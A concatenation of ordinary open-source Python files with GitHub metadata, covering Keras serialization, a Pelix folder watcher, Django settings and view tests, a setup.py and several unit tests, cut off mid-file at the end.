custom_objects = custom_objects or {}
if 'custom_objects' in arg_spec.args:
return cls.from_config(
cls_config,
custom_objects=dict(
list(custom_objects.items())))
return cls.from_config(cls_config)
else:
# Then `cls` may be a function returning a class.
# in this case by convention `config` holds
# the kwargs of the function.
custom_objects = custom_objects or {}
return cls(**cls_config)
elif isinstance(identifier, six.string_types):
object_name = identifier
if custom_objects and object_name in custom_objects:
obj = custom_objects.get(object_name)
else:
obj = module_objects.get(object_name)
if obj is None:
raise ValueError(
'Unknown ' + printable_module_name + ': ' + object_name)
# Classes passed by name are instantiated with no args, functions are
# returned as-is.
if tf_inspect.isclass(obj):
return obj()
return obj
elif tf_inspect.isfunction(identifier):
# If a function has already been deserialized, return as is.
return identifier
else:
raise ValueError('Could not interpret serialized %s: %s' %
(printable_module_name, identifier))
def _class_and_config_for_serialized_keras_object(
config,
module_objects=None,
custom_objects=None,
printable_module_name='object'):
"""Returns the class name and config for a serialized keras object."""
if (not isinstance(config, dict) or 'class_name' not in config or
'config' not in config):
raise ValueError('Improper config format: ' + str(config))
class_name = config['class_name']
cls = _get_registered_object(class_name, custom_objects=custom_objects,
module_objects=module_objects)
if cls is None:
raise ValueError('Unknown ' + printable_module_name + ': ' + class_name)
cls_config = config['config']
deserialized_objects = {}
for key, item in cls_config.items():
if isinstance(item, dict) and '__passive_serialization__' in item:
deserialized_objects[key] = _deserialize_keras_object(
item,
module_objects=module_objects,
custom_objects=custom_objects,
printable_module_name='config_item')
elif (isinstance(item, six.string_types) and
tf_inspect.isfunction(_get_registered_object(item, custom_objects))):
# Handle custom functions here. When saving functions, we only save the
# function's name as a string. If we find a matching string in the custom
# objects during deserialization, we convert the string back to the
# original function.
# Note that a potential issue is that a string field could have a naming
# conflict with a custom function name, but this should be a rare case.
# This issue does not occur if a string field has a naming conflict with
# a custom object, since the config of an object will always be a dict.
deserialized_objects[key] = _get_registered_object(item, custom_objects)
for key, item in deserialized_objects.items():
cls_config[key] = deserialized_objects[key]
return (cls, cls_config)
def _get_registered_object(name, custom_objects=None, module_objects=None):
if custom_objects and name in custom_objects:
return custom_objects[name]
elif module_objects and name in module_objects:
return module_objects[name]
return None
| {
"content_hash": "9ccb94cbf382d07f14f5c892be2d4524",
"timestamp": "",
"source": "github",
"line_count": 328,
"max_line_length": 80,
"avg_line_length": 36.426829268292686,
"alnum_prop": 0.6947606293940408,
"repo_name": "petewarden/tensorflow",
"id": "8da7c217826ee934af13b84ff0b068a844fde759",
"size": "12637",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/python/feature_column/serialization.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31796"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "895451"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82100676"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "112853"
},
{
"name": "Go",
"bytes": "1867248"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "984477"
},
{
"name": "Jupyter Notebook",
"bytes": "550862"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1982867"
},
{
"name": "Makefile",
"bytes": "66496"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "317461"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37425809"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "8992"
},
{
"name": "Shell",
"bytes": "700106"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3613406"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""
FileInstall: Polls for changes on files in a directory and notifies listeners
:author: Thomas Calmant
:copyright: Copyright 2014, isandlaTech
:license: Apache License 2.0
:version: 0.5.8
:status: Beta
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (0, 5, 8)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# Pelix
from pelix.ipopo.decorators import ComponentFactory, Provides, Requires, \
Validate, Invalidate, Instantiate, BindField, UnbindField, UpdateField, \
Property
import pelix.services as services
import pelix.threadpool
# Standard library
import logging
import os
import threading
import zlib
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
@ComponentFactory()
@Provides(services.SERVICE_FILEINSTALL)
@Requires('_listeners', services.SERVICE_FILEINSTALL_LISTENERS,
aggregate=True, optional=True)
@Property('_poll_time', 'poll.time', 1)
@Instantiate('pelix-services-file-install')
class FileInstall(object):
"""
Polls folders to look for files modifications
"""
def __init__(self):
"""
Sets up members
"""
# Listeners (injected)
self._listeners = []
# Folder -> [listeners] (computed)
self._folder_listeners = {}
# Polling delta time (1 second by default)
self._poll_time = 1
# Lock
self.__lock = threading.RLock()
# Single thread task pool to notify listeners
self.__pool = pelix.threadpool.ThreadPool(
1, logname="FileInstallNotifier")
# 1 thread per watched folder (folder -> Thread)
self.__threads = {}
# Thread stoppers (folder -> Event)
self.__stoppers = {}
# Validation flag
self.__validated = False
@Validate
def _validate(self, context):
"""
Component validated
"""
with self.__lock:
# Start the task pool
self.__pool.start()
# Update the flag
self.__validated = True
@Invalidate
def _invalidate(self, context):
"""
Component invalidated
"""
with self.__lock:
# Update the flag
self.__validated = False
# Stop all threads
for event in set(self.__stoppers.values()):
event.set()
# Wait for them
for thread in set(self.__threads.values()):
thread.join()
# Stop the task pool
self.__pool.stop()
# Clean up
self.__stoppers.clear()
self.__threads.clear()
@BindField('_listeners')
def _bind_listener(self, _, svc, svc_ref):
"""
A new listener is bound
"""
with self.__lock:
folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if folder:
# Register the listener for this service
self.add_listener(folder, svc)
@UpdateField('_listeners')
def _update_field(self, _, svc, svc_ref, old_props):
"""
A bound listener has been updated
"""
with self.__lock:
old_folder = old_props.get(services.PROP_FILEINSTALL_FOLDER)
new_folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if old_folder != new_folder:
# Folder changed
self.remove_listener(old_folder, svc)
self.add_listener(new_folder, svc)
@UnbindField('_listeners')
def _unbind_listener(self, _, svc, svc_ref):
"""
A listener is gone
"""
with self.__lock:
folder = svc_ref.get_property(services.PROP_FILEINSTALL_FOLDER)
if folder:
# Remove the listener
self.remove_listener(folder, svc)
def add_listener(self, folder, listener):
"""
Manual registration of a folder listener
:param folder: Path to the folder to watch
:param listener: Listener to register
:return: True if the listener has been registered
"""
with self.__lock:
# Simply add the listener
if folder:
try:
listeners = self._folder_listeners[folder]
except KeyError:
# Unknown folder
listeners = self._folder_listeners[folder] = set()
# Start a new thread
event = self.__stoppers[folder] = threading.Event()
thread = threading.Thread(
target=self.__watch,
args=(folder, event),
name="FileInstall-{0}".format(folder))
thread.daemon = True
self.__threads[folder] = thread
thread.start()
listeners.add(listener)
return True
return False
def remove_listener(self, folder, listener):
"""
Manual unregistration of a folder listener.
:param folder: Path to the folder the listener watched
:param listener: Listener to unregister
:raise ValueError: The listener wasn't watching this folder
"""
with self.__lock:
# Remove the listener
listeners = self._folder_listeners[folder]
listeners.remove(listener)
if not listeners:
try:
# Stop the corresponding thread
self.__stoppers.pop(folder).set()
except KeyError:
# Component invalidated
pass
else:
# Wait for the thread to stop
self.__threads.pop(folder).join()
# No more listener for this folder
del self._folder_listeners[folder]
def __notify(self, folder, added, updated, deleted):
"""
Notifies listeners that files of a folder has been modified
:param folder: Folder where changes occurred
:param added: Names of added files
:param updated: Names of modified files
:param deleted: Names of removed files
"""
with self.__lock:
try:
# Get a copy of the listeners for this folder
listeners = self._folder_listeners[folder].copy()
except KeyError:
# No (more) listeners: do nothing
return
for listener in listeners:
try:
listener.folder_change(folder, added, updated, deleted)
except Exception as ex:
_logger.exception("Error notifying a folder listener: %s", ex)
def __get_checksum(self, filepath):
"""
Returns the checksum (Adler32) of the given file
:param filepath: Path to the file
:return: The checksum (int) of the given file
:raise OSError: File not accessible
:raise IOError: File not readable
"""
# Don't forget to open the file in binary mode
with open(filepath, 'rb') as filep:
# Return the checksum of the given file
return zlib.adler32(filep.read())
def __get_file_info(self, folder, filename):
"""
Returns the (mtime, checksum) tuple for the given file
:param folder: Path to the parent folder
:param filename: Base name of the file
:return: A tuple containing file information
:raise OSError: File not accessible
:raise IOError: File not readable
"""
filepath = os.path.join(folder, filename)
return os.path.getmtime(filepath), self.__get_checksum(filepath)
def __check_different(self, folder, filename, file_info, updated):
"""
Checks if the given file has changed since the previous check
:param folder: Path to the parent folder
:param filename: Base name of the file
:param file_info: Current information about the file
:param updated: Set of updated files, where the file name might be
added
:return: The (updated) file information tuple
:raise OSError: File not accessible
:raise IOError: File not readable
"""
# Compute the file path
filepath = os.path.join(folder, filename)
# Get the previous modification time
previous_mtime = file_info[0]
# Get the new modification time
mtime = os.path.getmtime(filepath)
if previous_mtime == mtime:
# No modification (no need to compute the checksum)
return file_info
# Get the previous checksum
previous_checksum = file_info[1]
# Compute the new one
checksum = self.__get_checksum(filepath)
if previous_checksum == checksum:
# No real modification, update file info
return mtime, checksum
# File modified
updated.add(filename)
return mtime, checksum
def __watch(self, folder, stopper):
"""
Loop that looks for changes in the given folder
:param folder: Folder to watch
:param stopper: An Event object that will stop the loop once set
"""
# File name -> (modification time, checksum)
previous_info = {}
while not stopper.wait(self._poll_time) and not stopper.is_set():
if not os.path.exists(folder):
# Nothing to do yet
continue
# Look for files
filenames = set(filename for filename in os.listdir(folder)
if os.path.isfile(os.path.join(folder, filename)))
# Prepare the sets
added = set()
updated = set()
deleted = set(previous_info.keys()).difference(filenames)
# Compute differences
for filename in filenames:
try:
# Get previous information
file_info = previous_info[filename]
except KeyError:
# Unknown file: added one
added.add(filename)
previous_info[filename] = self.__get_file_info(folder,
filename)
else:
try:
# Known file name
new_info = self.__check_different(folder, filename,
file_info, updated)
# Store new information
previous_info[filename] = new_info
except (IOError, OSError):
# Error reading file, do nothing
pass
# Remove information about deleted files
for filename in deleted:
del previous_info[filename]
if added or updated or deleted:
# Something changed: notify listeners
self.__pool.enqueue(self.__notify, folder, added, updated,
deleted)
| {
"content_hash": "691cc3ec764ee4f8a13aa8e9b528fabc",
"timestamp": "",
"source": "github",
"line_count": 375,
"max_line_length": 80,
"avg_line_length": 32.29866666666667,
"alnum_prop": 0.5434280052840158,
"repo_name": "isandlaTech/cohorte-demos",
"id": "8d695305aa2d1a32432eb1f21e7d7b906c0faf00",
"size": "12166",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-1.0.0-20141201.234602-19-python-distribution/repo/bundles/pelix/services/fileinstall.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "4339"
},
{
"name": "Batchfile",
"bytes": "3349"
},
{
"name": "CSS",
"bytes": "722861"
},
{
"name": "HTML",
"bytes": "267983"
},
{
"name": "Java",
"bytes": "22060"
},
{
"name": "JavaScript",
"bytes": "11127825"
},
{
"name": "Python",
"bytes": "16153349"
},
{
"name": "Shell",
"bytes": "33275"
}
],
"symlink_target": ""
} |
import sys
class Settings:
defaults = {
#: A list of one or more sitemaps to inform robots about:
"SITEMAP_URLS": ("ROBOTS_SITEMAP_URLS", []),
"USE_SITEMAP": ("ROBOTS_USE_SITEMAP", True),
"USE_HOST": ("ROBOTS_USE_HOST", True),
"CACHE_TIMEOUT": ("ROBOTS_CACHE_TIMEOUT", None),
"SITE_BY_REQUEST": ("ROBOTS_SITE_BY_REQUEST", False),
"USE_SCHEME_IN_HOST": ("ROBOTS_USE_SCHEME_IN_HOST", False),
"SITEMAP_VIEW_NAME": ("ROBOTS_SITEMAP_VIEW_NAME", False),
}
def __getattr__(self, attribute):
from django.conf import settings
if attribute in self.defaults:
return getattr(settings, *self.defaults[attribute])
sys.modules[__name__] = Settings()
| {
"content_hash": "83c7008d33693cefcab5efc37eb29d09",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 67,
"avg_line_length": 32.391304347826086,
"alnum_prop": 0.6013422818791946,
"repo_name": "jazzband/django-robots",
"id": "bcd58daa975f5398504b2d47a990010eed4a8cfd",
"size": "745",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/robots/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "618"
},
{
"name": "Python",
"bytes": "26727"
}
],
"symlink_target": ""
} |
import numpy as np
from ...tests.instance import gaussian_instance
from ..lasso import data_carving, data_splitting
def sim():
X, Y, _, active, sigma = gaussian_instance()
print(sigma)
G = data_carving.gaussian(X, Y, 1., split_frac=0.9, sigma=sigma)
G.fit()
if set(active).issubset(G.active) and G.active.shape[0] > len(active):
return [G.hypothesis_test(G.active[len(active)], burnin=5000, ndraw=10000)]
return []
def sim2():
X, Y, _, active, sigma = gaussian_instance(n=150, s=3)
G = data_splitting.gaussian(X, Y, 5., split_frac=0.5, sigma=sigma)
G.fit(use_full=True)
if set(active).issubset(G.active) and G.active.shape[0] > len(active):
return [G.hypothesis_test(G.active[len(active)])]
return []
| {
"content_hash": "dc8a0065bb36efad273201ab6b50234c",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 83,
"avg_line_length": 36.38095238095238,
"alnum_prop": 0.650523560209424,
"repo_name": "selective-inference/selective-inference",
"id": "2e140e0a298a673768e25d8897e50820ff1fbabf",
"size": "764",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "selectinf/algorithms/tests/test_data_carving.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "269"
},
{
"name": "C++",
"bytes": "13148"
},
{
"name": "Python",
"bytes": "572490"
},
{
"name": "R",
"bytes": "11134"
},
{
"name": "TeX",
"bytes": "3355"
}
],
"symlink_target": ""
} |
"""
Meraki API Setup module.
"""
from os import path
from codecs import open as codecs_open
from setuptools import setup, find_packages
from meraki_api import __version__
HERE = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with codecs_open(path.join(HERE, 'README.rst'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
# unittests
import unittest
def meraki_api_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('tests', pattern='test_*.py')
return test_suite
setup(
name='meraki_api',
version=__version__,
description='Meraki Dashboard API wrapper.',
long_description=LONG_DESCRIPTION,
url='https://github.com/guzmonne/meraki_api',
# Author details
author='Guzmán Monné',
author_email='[email protected]',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
# Github archive
download_url=(
"https://github.com/guzmonne/meraki_api/archive/"
+ __version__
+ ".tar.gz"
),
# What does your project relate to?
keywords='api development',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['requests'],
test_suite='setup.meraki_api_test_suite',
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
#extras_require={
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
)
| {
"content_hash": "a7532d654e0845980e0be1710274fd03",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 77,
"avg_line_length": 34.534246575342465,
"alnum_prop": 0.6390321301071004,
"repo_name": "guzmonne/meraki_api",
"id": "a3d87c752c03f0a9b8a423c00e1928ec8006a84b",
"size": "2547",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "757"
},
{
"name": "Python",
"bytes": "89849"
}
],
"symlink_target": ""
} |
import pytest
from mock import call, sentinel
from ensime_shared.editor import Editor
@pytest.fixture
def editor(vim):
mockeditor = Editor(vim)
assert vim.mock_calls == [call.eval("has('nvim')")]
vim.reset_mock() # Clear above constructor vim calls from call list
return mockeditor
def test_append(editor, vim):
editor.append('new')
editor.append('new', sentinel.lineno)
buffer = vim.current.buffer
assert buffer.mock_calls == [
call.append('new'),
call.append('new', sentinel.lineno),
]
def test_current_word(editor, vim):
editor.current_word()
vim.eval.assert_called_with('expand("<cword>")')
def test_doautocmd(editor, vim):
editor.doautocmd('BufLeave')
editor.doautocmd('BufReadPre', 'BufRead', 'BufEnter')
assert vim.mock_calls == [
call.command('doautocmd BufLeave'),
call.command('doautocmd BufReadPre,BufRead,BufEnter'),
]
def test_edit(editor, vim):
editor.edit('foo.scala')
vim.command.assert_called_with('edit foo.scala')
def test_getlines(editor, vim):
# The buffer objects behave like sequences
lines = ['line 1', 'line2', 'line3']
vim.current.buffer = lines[:]
assert editor.getlines() == lines
class TestMenu:
prompt = 'Choose one:'
choices = ['one', 'two', 'three']
def test_choice(self, editor, vim):
# Stub the user's inputlist choice
vim.eval.return_value = 2
choice = editor.menu(self.prompt, self.choices)
assert choice == 'two'
positional = vim.eval.call_args[0]
assert 'inputlist' in positional[0]
def test_none(self, editor, vim):
vim.eval.return_value = 0
choice = editor.menu(self.prompt, self.choices)
assert choice is None
def test_set_filetype(editor, vim):
editor.set_filetype('package_info')
editor.set_filetype('package_info', 3)
assert vim.mock_calls == [
call.command('set filetype=package_info'),
call.command('3bufdo set filetype=package_info'),
]
def test_set_buffer_options(editor, vim):
# Stub Buffer object's mapping API for options, see `:h python-buffer`
setlocal = {}
vim.current.buffer.options = setlocal
opts = {'buftype': 'nofile', 'buflisted': False}
editor.set_buffer_options(opts)
assert setlocal == opts
class TestSplitWindow:
def test_creates_empty_splits(self, editor, vim):
editor.split_window(None)
editor.split_window(None, vertical=True)
assert vim.mock_calls == [call.command('new'), call.command('vnew')]
def test_creates_file_splits(self, editor, vim):
editor.split_window('foo.scala')
editor.split_window('foo.scala', vertical=True)
assert vim.mock_calls == [
call.command('split foo.scala'),
call.command('vsplit foo.scala'),
]
def test_can_size_splits(self, editor, vim):
editor.split_window('foo.scala', size=50)
vim.command.assert_called_once_with('50split foo.scala')
def test_sets_buffer_options(self, editor, mocker):
# Stub actual implementation, it's already tested
editor.set_buffer_options = mocker.stub()
editor.split_window('foo.scala', bufopts=sentinel.bufopts)
editor.set_buffer_options.assert_called_once_with(sentinel.bufopts)
def test_write(editor, vim):
editor.write()
editor.write(noautocmd=True)
assert vim.mock_calls == [
call.command('write'),
call.command('noautocmd write'),
]
| {
"content_hash": "7dafb23e0f44b69bc7ab444781fc3755",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 76,
"avg_line_length": 27.426356589147286,
"alnum_prop": 0.6458451102317694,
"repo_name": "ensime/ensime-vim",
"id": "708e86e605be848398a968f43b823429ea55dbed",
"size": "3555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_editor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "4104"
},
{
"name": "Makefile",
"bytes": "1458"
},
{
"name": "Python",
"bytes": "118775"
},
{
"name": "Vim script",
"bytes": "12841"
}
],
"symlink_target": ""
} |
from openturns import *
TESTPREAMBLE()
RandomGenerator.SetSeed(0)
try:
distribution = Beta(0.2, 0.6, -1.0, 2.0)
size = 10000
sample = distribution.getSample(size)
factory = BetaFactory()
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(0.5, 1.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(0.5, 2.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(1.5, 4.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
estimatedDistribution = factory.build()
print "Default distribution=", estimatedDistribution
estimatedDistribution = factory.build(
distribution.getParametersCollection())
print "Distribution from parameters=", estimatedDistribution
estimatedBeta = factory.buildAsBeta(sample)
print "Beta =", distribution
print "Estimated Beta=", estimatedBeta
estimatedBeta = factory.buildAsBeta()
print "Default Beta=", estimatedBeta
estimatedBeta = factory.buildAsBeta(distribution.getParametersCollection())
print "Beta from parameters=", estimatedBeta
except:
import sys
print "t_BetaFactory_std.py", sys.exc_type, sys.exc_value
| {
"content_hash": "3a14518359b6fc84c6504afc21720764",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 79,
"avg_line_length": 40.86363636363637,
"alnum_prop": 0.7246941045606229,
"repo_name": "sofianehaddad/ot-svn",
"id": "6427020847dd0c61efa42df6df41515ba577274d",
"size": "1822",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/test/t_BetaFactory_std.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6498"
},
{
"name": "C",
"bytes": "455749"
},
{
"name": "C++",
"bytes": "10021345"
},
{
"name": "CMake",
"bytes": "240050"
},
{
"name": "FORTRAN",
"bytes": "299"
},
{
"name": "Makefile",
"bytes": "12372"
},
{
"name": "NSIS",
"bytes": "26263"
},
{
"name": "Python",
"bytes": "1221927"
},
{
"name": "R",
"bytes": "11141"
},
{
"name": "Scilab",
"bytes": "2612"
},
{
"name": "Shell",
"bytes": "20403"
},
{
"name": "TeX",
"bytes": "4250"
},
{
"name": "Visual Basic",
"bytes": "3294"
}
],
"symlink_target": ""
} |
import unittest
import random
from tests import testutils
from common import environment
from tests import testconstants
from services.repower.repower import repowerservice
from services.repower.repower.domain import repowerrequest
from services.repower.repower.domain import transactionamount
from services.repower.repower.domain import cardacceptor
from services.repower.repower_reversal import repowerreversalservice
from services.repower.repower_reversal.domain import repowerreversalrequest
class RepowerServiceTest(unittest.TestCase):
def setUp(self):
test_utils = testutils.TestUtils(environment.Environment.SANDBOX)
self._service = repowerservice.RepowerService(testconstants.TestConstants.SANDBOX_CONSUMER_KEY,
test_utils.get_private_key(),
environment.Environment.SANDBOX)
self._service_reversal = repowerreversalservice.RepowerReversalService(testconstants.TestConstants.SANDBOX_CONSUMER_KEY,
test_utils.get_private_key(),
environment.Environment.SANDBOX)
def test_repower_service(self):
trans_ref = self.trans_ref_num(19)
repower_request = repowerrequest.RepowerRequest()
repower_request.transaction_reference = trans_ref
repower_request.card_number = '5184680430000014'
transaction_amount = transactionamount.TransactionAmount()
transaction_amount.value = '000000030000'
transaction_amount.currency = '840'
repower_request.transaction_amount = transaction_amount
repower_request.local_date = '1230'
repower_request.local_time = '092435'
repower_request.channel = 'W'
repower_request.ica = '009674'
repower_request.processor_id = '9000000442'
repower_request.routing_and_transit_number = '990442082'
repower_request.merchant_type = '6532'
card_acceptor = cardacceptor.CardAcceptor()
card_acceptor.name = 'Prepaid Load Store'
card_acceptor.city = 'St Charles'
card_acceptor.state = 'MO'
card_acceptor.postal_code = '63301'
card_acceptor.country = 'USA'
repower_request.card_acceptor = card_acceptor
repower = self._service.get_repower(repower_request)
assert repower.request_id is not None
assert int(repower.request_id) > 0
assert int(repower.transaction_history.transaction.response.code) == 00
repower_reversal_request = repowerreversalrequest.RepowerReversalRequest()
repower_reversal_request.ica = '009674'
repower_reversal_request.reversal_reason = 'UNIT TEST'
repower_reversal_request.transaction_reference = trans_ref
repower_reversal = self._service_reversal.get_repower_reversal(repower_reversal_request)
assert repower_reversal.request_id is not None
assert int(repower_reversal.transaction_history.transaction.response.code) == 00
def trans_ref_num(self, x, leading_zeroes=True):
if not leading_zeroes:
return random.randint(10**(x-1), 10**x-1)
else:
if x > 6000:
return ''.join([str(random.randint(0, 9)) for i in range(x)])
else:
return str("%0." + str(x) + "d") % random.randint(0, 10**x-1) | {
"content_hash": "fe49d45af4d245dff4d91549701818bc",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 128,
"avg_line_length": 47.63013698630137,
"alnum_prop": 0.6560253091745758,
"repo_name": "M4gn4tor/mastercard-api-python",
"id": "aba5848cbf3ac0e2105228651b39a61fe9dbd798",
"size": "3477",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Tests/services/repower/repowerservicetest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "229234"
}
],
"symlink_target": ""
} |
"""
Test `redirects.views` file
"""
from django.urls import resolve, reverse_lazy
from django.views.generic import TemplateView
import pytest
from ratelimit.mixins import RatelimitMixin
from redirects.forms import RedirectModelForm
from redirects.models import Redirect
from redirects.views import RedirectFormView, ActualRedirectView
class TestRedirectFormView:
"""
Tests for 'redirects.views.RedirectFormView'
"""
view = RedirectFormView
url = reverse_lazy('redirects:form')
def test_view_inheritance(self):
"""Test view inheritance name"""
assert isinstance(self.view(), TemplateView)
assert isinstance(self.view(), RatelimitMixin)
def test_view_url_reversing(self):
"""Test view URL reversing"""
assert str(self.url) == '/'
assert (
resolve(self.url)._func_path ==
'redirects.views.RedirectFormView'
)
def test_view_template(self):
"""Test view template name"""
assert self.view.template_name == 'redirects/form.html'
def test_view_ratelimit_config(self):
"""Test view 'django-ratelimit' config"""
assert self.view.ratelimit_key == 'ip'
assert self.view.ratelimit_rate == '5/m'
assert self.view.ratelimit_block
def test_view_allowed_methods(self):
"""Test view allowed methods"""
assert set(self.view.http_method_names) == {'get', 'post'}
def test_view_rendering(self, client):
"""Test view rendering"""
response = client.get(self.url)
assert response.status_code == 200
assert 'form' in response.context
assert isinstance(response.context['form'], RedirectModelForm)
@pytest.mark.django_db
def test_view_redirect_creation(self, monkeypatch, faker, mocker, client):
"""Test creating a new `Redirect` instance with the view"""
monkeypatch.setenv('RECAPTCHA_TESTING', 'True')
ip_address = faker.ipv4()
mocker.patch('redirects.views.get_real_ip', return_value=ip_address)
data = {
'local_path': faker.uri_path(),
'destination_url': faker.uri(),
'g-recaptcha-response': 'PASSED',
}
response = client.post(self.url, data)
assert response.status_code == 200
assert hasattr(response.context['view'], 'redirect')
assert isinstance(response.context['view'].redirect, Redirect)
redirect = response.context['view'].redirect
assert redirect.local_path == data['local_path']
assert redirect.destination_url == data['destination_url']
assert redirect.sender_ip == ip_address
class TestActualRedirectView:
"""
Tests for 'redirects.views.ActualRedirectView'
"""
view = ActualRedirectView
def test_view_inheritance(self):
"""Test view inheritance name"""
assert isinstance(self.view(), TemplateView)
@pytest.mark.django_db
def test_view_url_reversing(self, redirect):
"""Test view URL reversing"""
url = '/' + redirect.local_path
resolver = resolve(url)
assert resolver.view_name == 'redirects:redirect'
assert resolver.kwargs == {
'local_path': redirect.local_path,
}
assert (
resolver._func_path ==
'redirects.views.ActualRedirectView'
)
def test_view_template(self):
"""Test view template name"""
assert self.view.template_name == 'redirects/redirect.html'
def test_view_allowed_methods(self):
"""Test view allowed methods"""
assert set(self.view.http_method_names) == {'get'}
@pytest.mark.django_db
def test_view_rendering(self, redirect, client):
"""Test view rendering"""
url = '/' + redirect.local_path
response = client.get(url)
assert response.status_code == 200
html_redirect = (
'<meta http-equiv="refresh" content="1; url={}">'.format(
redirect.destination_url
)
).encode()
assert html_redirect in response.content
js_redirect = (
'window.location.href = "{}";'.format(redirect.destination_url)
).encode()
assert js_redirect in response.content
def test_view_rendering_with_non_existent_redirect(self, faker, client):
"""Test trying to access non existent redirect"""
url = faker.uri_path()
response = client.get(url)
assert response.status_code == 404
@pytest.mark.django_db
def test_view_clicks_counting(self, redirect, client):
"""Test redirect clicks counting"""
url = '/' + redirect.local_path
client.get(url)
client.get(url)
client.get(url)
redirect.refresh_from_db()
assert redirect.clicks == 3
| {
"content_hash": "b624fbf830171b609c27745978dcd532",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 78,
"avg_line_length": 31.448051948051948,
"alnum_prop": 0.6231674581870741,
"repo_name": "pawelad/fakester",
"id": "6bdc72ac5a33878b04cbd8fb955d33738f8ca212",
"size": "4843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/redirects/test_views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "771"
},
{
"name": "HTML",
"bytes": "6985"
},
{
"name": "Python",
"bytes": "23725"
}
],
"symlink_target": ""
} |
"""Utility functions."""
from __future__ import unicode_literals
from datetime import datetime
from collections import OrderedDict
from builtins import str
def from_iso_date(str):
